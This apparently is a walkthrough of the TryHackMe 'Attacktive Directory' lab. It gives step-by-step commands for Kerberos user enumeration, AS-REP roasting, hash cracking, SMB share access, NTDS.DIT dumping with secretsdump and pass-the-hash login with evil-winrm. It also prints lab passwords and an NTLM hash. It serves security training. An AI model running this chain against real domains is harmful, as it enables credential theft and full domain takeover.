I am writing this to assist anyone looking to get through the Attacktive Directory room on TryHackMe. I hope you’ll be able to further your knowledge even more on your Active Directory journey.
Prerequisites
- Access to Internet and a TryHackMe account
- Access to a Kali Linux machine
- Access the room found here:
Task 1: Intro Deploy The Machine
This part requires you to connect to the machine which can be done by using OpenVPN with the details provided. Incase you have any challenges, you can consider going through the following room:
Alternatively, you can also use In-Browser Kali or Attack Box
Task 2: Intro Setup
- This section requires you to install two tools that you’ll be using throughout the room
- impacket
- bloodhound
- neo4j
- Keep track of these tools and the directories they are stored at as we’ll be making use of them heavily later 😁
- You can follow the instructions in the room and you should be able to install the tools easily.
Task 3: Enumeration Welcome to Attacktive Directory
- This task now brings into question your enumeration skills. We can begin with a simple nmap scan to discover open ports on the host machine
- To understand nmap, you can use the following room
What tool will allow us to enumerate port 139/445?
- This required a bit of research to discover the answer but you should find the correct tool with the characters required is:
enum4linux
- We can get the answer to the remaining questions by reading through the nmap scan.
What is the NetBIOS-Domain Name of the machine?
What invalid TLD do people commonly use for their Active Directory Domain?
- The answer to the last question can also be gotten through research
Task 4: Enumeration Enumerating Users via Kerberos
Kerberos is an authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner. This can be similar to using 0Auth when signing up for services.
- We begin this task by downloading kerbrute from it’s github repository as provided for in the room. Depending on where you’re running it from you can choose the correct download link. I opted to use:
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_386
- A modified User List and Password List is also provided which should be downloaded to be used as well
- We can then launch it using
./kerbrute_linux_386- We get the following banner and options we can use which you should go through.
What command within Kerbrute will allow us to enumerate valid usernames?
- The answer to the first question is provided for in the Available Commands section of the kerbrute tool upon launching it.
What notable account is discovered? (These should jump out at you)
What is the other notable account is discovered? (These should jump out at you)
- We then execute the userenum command as follows using the appropriate flags:
./kerbrute_linux_386 userenum — dc 10.10.230.203 -d spookysec.local userlist.txt -t 1000- -dc: It is used to point to the IP of the domain controller
- -d: It is used to point to the TLD for the Active Directory
- userlist.txt is the provided userlist for enumeration
- -t: It is used to specify how many threads we would like to use. You can choose any other number
- We should be able to get the following output of usernames where certain usernames stand out which should help us get the answers to the remaining questions in this section
Task 5: Exploitation Abusing Kerberos
Further details about ASEPRoasting that has been referenced in this task can be found at
- We can begin by navigating to the storage location for the GetNPUsers.py tool by issuing the following command
cd /opt/impacket/examples/We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
- The answer to this question required a bit of trial and error and the correct account that was vulnerable to ASEPRoasting was
svc-admin
- We can confirm this by running the following command which results in a hash dump of the password for the svc-admin
python3 GetNPUsers.py -dc-ip 10.10.11.14 spookysec.local/svc-admin -no-pass- -dc-ip: It is used to provide the IP address of domain name of the domain controller
- spookysec.local/svc-admin is used to show the domain and user we would like to check the script against
- -no-pass: It is used when the user account has no password
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
- We can then look at the wiki page to find and search using the first few strings of the hash we received
- We can search using the string $krb5asrep
- From here we can clearly see the answer to the question
What mode is the hash?
- The answer to this question can also be gotten from the Wiki page above.
Now crack the hash with the modified password list provided, what is the user accounts password?
- For this section, you can opt to choose whichever one of your favorite password cracking tools you want. I will be using John the Ripper.
- Copy the hash as it was and paste into a file of your choosing with any arbitrary name. I used svc_admin_hash.txt
- We then run John the Ripper to crack the hash and view the final password using the following commands:
john — wordlist=passwordlist.txt svc_admin_hash.txt
john --show svc_admin_hash.txt- We then get the password which we can use to answer the last question
Task 6: Enumeration Back to the Basics
- This task now shows us how we can enumerate any directories that the specific user might be sharing
What utility can we use to map remote SMB shares?
- We can use the hint for this question to receive the answer.
- The following article might also come in very handy for quick reference to smbclient. A cheatsheet if you will.
Which option will list shares?
- The answer to this cannot be gotten from the output of the command
man smbclient
How many remote shares is the server listing?
- We can then execute the tool using the username and password we extracted to enumerate the number of share. This can be done with the command
smbclient -L 10.10.11.14 -U svc-admin%management2005- -U: This is used to provide the username
- % : This is used if we wish to provide the password on the command line
- This should result in the following output.
There is one particular share that we have access to that contains a text file. Which share is it?
- To access shares on smbclient, we can then use
smbclient \\\\10.10.11.14\\ADMIN$ -U svc-admin%management2005- We can use the
helpcommand to get a list of smbclient commands we can use once we access a share - As per the specifications of the question, we find only one share with a .txt file
What is the content of the file?
- We can then download this file using the
getcommand and receive it in the current directory on our local machine:
get backup_credentials.txt- We then cat the file to see the credentials:
cat backup_credentials.txt
Decoding the contents of the file, what is the full contents?
- We can then identify this as most likely being base64 encoding which we can then decode using the base64 kali tool using the following command
Wcat backup_credentials.txt | base64 -d
Task 7: Domain Privilege Escalation Elevating Privileges within the Domain
- At this point, it’s clear the domain credentials we recovered from svc-admin’s share are the login credentials for backup hence we can attempt a Privilege Escalation and see what else we can find
- We begin by going back to the storage location for secretsdump.py by using:
cd /opt/impacket/examples/What method allowed us to dump NTDS.DIT?
- We execute the secretsdump.py using the following command which results in the corresponding output.
python3 secretsdump.py
- Scrolling down we see under the display options section, the -just-dc flag which can be used to dump NTDS.DIT data
- We execute the script once more using this flag as the following command.
python3 secretsdump.py -just-dc backup:backup2517860@10.10.11.14- At the very beginning of the output, we are able to see the method used
What is the Administrators NTLM hash?
- The answer to this can be gotten from the output of the previous command as it is the first hash provided.
What method of attack could allow us to authenticate as the user without the password?
- This question required a bit of research but the following article clearly explains the method
Using a tool called Evil-WinRM what option will allow us to use a hash?
- We then do some research on how to install Evil-WinRM and the answer can be found at this github repository page:
- On the same page, we can see the options to use Evil-WinRM including the option we can use to authenticate using only a hash.
Task 8: Flag Submission Flag Submission Panel
- This task required us to use Evil-WinRm to then login in to the machine using the hash we got. This can be done with the command
evil-winrm -u ADMINISTRATOR -H 0e0363213e37b94221497260b0bcb4fc -i 10.10.11.14- -u : This is used to provide the username we would like to authenticate as.
- -H: This is used to provide the hash we would like to use as seen in the previous task.
- -i: This is used to provide the IP address of the machine we would like to log in to.
- This should result in the following successful login command line from which we can use Windows Commands to navigate and extract the final flags.
svc-admin
- We find the flag in the directory: C:\Users\svc-admin\Desktop\user.txt.txt
backup
- We find the flag in the directory: C:\Users\backup\Desktop\PrivEsc.txt
Administrator
- We find the flag in the directory: C:\Users\Administrator\Desktop\root.txt
Conclusion
- This was quite a fun room and I got to learn a number of tools that can be used during an attack on AD. I’ll be exploring further rooms of a similar nature to augment my knowledge further on AD.
- Congratulations unto you as well for being able to complete the room and I challenge you to join me as well in my AD journey.